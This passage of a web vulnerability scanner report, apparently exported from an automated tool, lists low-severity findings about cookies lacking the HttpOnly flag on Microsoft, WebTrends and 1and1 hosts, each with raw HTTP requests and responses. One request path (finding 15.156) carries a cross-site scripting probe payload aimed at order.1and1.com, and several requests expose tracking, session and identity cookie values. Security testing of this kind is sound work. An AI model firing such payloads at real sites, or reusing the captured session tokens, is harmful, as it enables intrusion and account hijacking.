Date: Sat, 26 Mar 2011 20:36:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=T5kjNZK9DYVVGP7AaVlxzKpwIg02FAHCdbdBwhQshXAcIIa4FAHCYGeBwhAZhXAcIoY4FAHCoopBwhQghXAcIkZ4FAHCv3gBwhwohXAcIAY4FAHCvGeBwhAmoZAcI8fFGAHCmMqBwhQ3gZAcIIZ4FAHCfGeBwhgQvaAcI8Y4FAHCFBqBwhQEhaAcuuyBO+nRKBbuHwokGoKmOAQMjYU1DwU+F2xAHZfBfKbnBUUoGBBslIwhNaMymiwAp/jB8D7uCMpkGoXr1Jge1ZMyuy0A/AoBhAr8Co2kGcZr+BSHrakmz29BapqhVxqjFo4bG6or5XwkLakmk6iBaYjxqSmDJas4AcPqGLzsmdwokaw1m+nB9LlR9L74HYooGMlsjdADgawUCKyB9mUhVFZAHAazF7sZmjoBPEKvHcuKGcdj0fw+NXw1; domain=advertising.com; expires=Mon, 25-Mar-2013 20:36:35 GMT; path=/
Set-Cookie: GUID=MTMwMTE3MTc5NTsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; domain=advertising.com; expires=Mon, 25-Mar-2013 20:36:35 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 26 Mar 2011 21:36:35 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
15.151. http://m.webtrends.com/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif?&dcsdat=1301103860455&dcssip=office.microsoft.com&dcsuri=/en-us/sharepoint-workspace/&dcsref=http://microsoftcambridge.com/Teams/tabid/55/Default.aspx&WT.co_f=173.193.214.243-1295665472.30133593&WT.vtid=173.193.214.243-1295665472.30133593&WT.vtvs=1301103648759&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Microsoft%20SharePoint%20Workspace%202010%20-%20Microsoft%20Office&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1426x995&WT.fv=10.2&WT.slv=Unknown&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=office.microsoft.com%2Fen-us%2Fsharepoint-workspace%2F&WT.cg_n=sharepoint-workspace&WT.sli=Installed&WT.z_locale=en-us&WT.dcsvid=688642bf9d16e14b952901540959fda0&WT.z_anonid=AxUFAAAAAAAABwAADIe%2BFnxFI293k92k7DipMA!!&WT.z_rioid=200027254-3%2F8%2F2011%2014%3A53%3A52&WT.z_msresearch_u=13011037237379667073420714586&WT.z_msresearch_s=&WT.z_MUID=FA3AE6176FAC4414AD6FC26C726B4B15&WT.vt_f_tlh=1301103820&oo_source=Web&oo_ul=en-US&oo_offver=Other&oo_assetid=FX101825648&oo_market=en-US&oo_bc=sharepoint-workspace&wtEvtSrc=office.microsoft.com%2Fen-us%2Fsharepoint-workspace%2F&wtDrillDir=%2Fen-us%2F%3B%2Fen-us%2Fsharepoint-workspace%2F&WT.dep=oo_source%3Boo_ul%3Boo_offver%3Boo_assetid%3Boo_market%3Boo_bc%3BwtEvtSrc%3BwtDrillDir HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://office.microsoft.com/en-us/sharepoint-workspace/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106144715:ss=1300105893745; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjk1NjY1NDcyLjMwMTMzNTkzAAAAAAANAAAACgAAAJtEjU3wQ41NmwEAACX2Wk0k9lpNrwEAACb2Wk0m9lpNcAAAALgUbU23FG1NHAEAAHAjbU1bI21NEAAAAAeVdk0HlXZNqAEAAOvPdk0Jy3ZNgwEAABhwe00WcHtNHgEAAFpwe01ZcHtNzwAAAEX4gE129IBNVgEAAMuxhk3LsYZNDQAAAMaqh03GqodNKwIAAIQOiU1xDolNBQAAABMAAACbRI1N8EONTZgAAAAl9lpNJPZaTRUAAADGqodNxqqHTRQAAAAHlXZNB5V2TUwAAABF+IBNdvSATQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Mar 2011 01:44:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjk1NjY1NDcyLjMwMTMzNTkzAAAAAAANAAAACgAAAJtEjU3wQ41NmwEAACX2Wk0k9lpNrwEAACb2Wk0m9lpNcAAAALgUbU23FG1NHAEAAHAjbU1bI21NEAAAABdFjU3ERI1NqAEAAOvPdk0Jy3ZNgwEAABhwe00WcHtNHgEAAFpwe01ZcHtNzwAAAEX4gE129IBNVgEAAMuxhk3LsYZNDQAAAMaqh03GqodNKwIAAIQOiU1xDolNBQAAABMAAACbRI1N8EONTZgAAAAl9lpNJPZaTRUAAADGqodNxqqHTRQAAAAXRY1NxESNTUwAAABF+IBNdvSATQAAAAA-; path=/; expires=Tue, 23-Mar-2021 01:44:55 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
15.152. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif?&dcsdat=1301101090279&dcssip=www.microsoft.com&dcsuri=/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx&dcsref=http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Microsoft%2520Trademarks&WT.js=Yes&WT.jv=1.5&WT.bs=1426x952&WT.fi=Yes&WT.fv=10.2&WT.sli=No&WT.seg_4=No&WT.em=uri&WT.le=ISO-8859-1&WT.dl=0&WT.dcsvid=GUID=688642bf9d16e14b952901540959fda0%26HASH=bf42%26LV=20112%26V=3&WT.wtsv=1&WT.co_f=173.193.214.243-1295665472.30133593&WT.vt_f_tlh=1300827775&WT.vt_f_tlv=1300827758&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=173.193.214.243-1295665472.30133593.1301101090290&wt_pt=HP&wtEvtSrc=www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx&wt_ngn=1 HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106144715:ss=1300105893745; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjk1NjY1NDcyLjMwMTMzNTkzAAAAAAANAAAACgAAAIY6h03+OYdNmwEAACX2Wk0k9lpNrwEAACb2Wk0m9lpNcAAAALgUbU23FG1NHAEAAHAjbU1bI21NEAAAAAeVdk0HlXZNqAEAAOvPdk0Jy3ZNgwEAABhwe00WcHtNHgEAAFpwe01ZcHtNzwAAAEX4gE129IBNVgEAAMuxhk3LsYZNDQAAAMaqh03GqodNKwIAAIQOiU1xDolNBQAAABMAAACEDolNcQ6JTZgAAAAl9lpNJPZaTRUAAADGqodNxqqHTRQAAAAHlXZNB5V2TUwAAABF+IBNdvSATQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Mar 2011 00:58:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjk1NjY1NDcyLjMwMTMzNTkzAAAAAAANAAAACgAAAE46jU3yOY1NmwEAACX2Wk0k9lpNrwEAACb2Wk0m9lpNcAAAALgUbU23FG1NHAEAAHAjbU1bI21NEAAAAAeVdk0HlXZNqAEAAOvPdk0Jy3ZNgwEAABhwe00WcHtNHgEAAFpwe01ZcHtNzwAAAEX4gE129IBNVgEAAMuxhk3LsYZNDQAAAMaqh03GqodNKwIAAIQOiU1xDolNBQAAABMAAABOOo1N8jmNTZgAAAAl9lpNJPZaTRUAAADGqodNxqqHTRQAAAAHlXZNB5V2TUwAAABF+IBNdvSATQAAAAA-; path=/; expires=Tue, 23-Mar-2021 00:58:54 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
15.153. http://office.microsoft.com/en-us/sharepoint-workspace/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://office.microsoft.com
Path:   /en-us/sharepoint-workspace/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/sharepoint-workspace/ HTTP/1.1
Host: office.microsoft.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; awsuserguid=guid=555d7aa3-a6f7-4e86-8d0a-2b83cddf17e8; _DetectCookies=Y; ul=1; WT_NVR=0=/:1=en-us:2=en-us/sharepoint-workspace|en-us/sharepoint-designer-help; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093020097:ss=1301092848759; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3f56dd2f-a3a7-46f9-9355-bcc55a4ce532&Microsoft.CreationDate=03/26/2011 01:42:52&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.NumberOfVisits=1&SessionCookie.Id=D193A9CF69CB420783FEEAA9C80CD6AE; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.VisitStartDate=03/26/2011 01:42:52&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; MS0=2a3c4c9fe97247d48c9a5163057b9a69

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="ADM CAO CONi COR CUR DEV DSP IND OTRi OUR PSA PUBi STA STP"
SPRequestGuid: ea1805de-a9b0-46fc-b6d2-6a99cdf6e544
X-SharePointHealthScore: 0
X-AspNet-Version: 2.0.50727
Set-Cookie: lc=en-US; domain=office.microsoft.com; path=/
X-UA-Compatible: IE=8
X-LLCC: en-US
X-Machine: SN1REN140
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.4762
Date: Sat, 26 Mar 2011 01:43:25 GMT
Content-Length: 45841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
15.154. http://order.1and1.com/xml/order  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=17d0cd8c3629f800

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 25 Mar 2011 20:43:31 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4f6d1cc610415400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a
Content-Length: 0
Content-Type: text/plain

15.155. http://order.1and1.com/xml/order  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 25 Mar 2011 20:43:33 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085813561
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=mcGU1ODkvWFhYUmVbYihgWicwOnNmYDhPQjwkKCUlJCIkIh8fIiEbHjksLi0sKU48aF1fbSUnIlIrVWQqHR4aMDUxLzIwKjIpKDFpajAmLFxlKx4fGxswNzM1LS0tKio=; Expires=Wed, 12-Apr-2079 23:57:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8

15.156. http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 25 Mar 2011 20:42:58 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=20b5b44720fc7000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3;jsessionid=39BF112E76B782FE12D86EB23D88897B.TCpfix142a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
Content-Length: 0
Content-Type: text/plain

15.157. http://order.1and1.com/xml/order/DomaininfoMove  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/DomaininfoMove HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:41 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1c32fb7ebe219400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/DomaininfoMove;jsessionid=5856C7A7F83BA9371A8BF974D4F039D2.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.158. http://order.1and1.com/xml/order/Eshops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Eshops HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:49 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=359301b05c4ea400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Eshops;jsessionid=136C71D2DBC3DD13F8F8CA233EAF4A9E.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.159. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10
If-None-Match: b893ed23e93e100ddf8d3139f7f81ff4

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 21:08:20 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMpL19oLiEiHh4cIx84MDAwLS0=; Expires=Thu, 13-Apr-2079 00:22:27 GMT; Path=/
ETag: 5f516b3df0af9786bc8afb1e77028d17
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36385


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
15.160. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Home HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:15:55 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=178282d1d330d000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Home;jsessionid=2FD708C8EA412DB1A7BE777B740D98BD.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.161. http://order.1and1.com/xml/order/Hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Hosting HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:47 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=65dea0ca83b3e000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Hosting;jsessionid=C82A134D0D3F791A1B7E374C2885CC49.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain

15.162. http://order.1and1.com/xml/order/Instant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Instant HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 00:17:40 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=6d5b8d59f6cf9800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Instant;jsessionid=05D2F7238E68B927BBD65C26FAEDAC83.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain

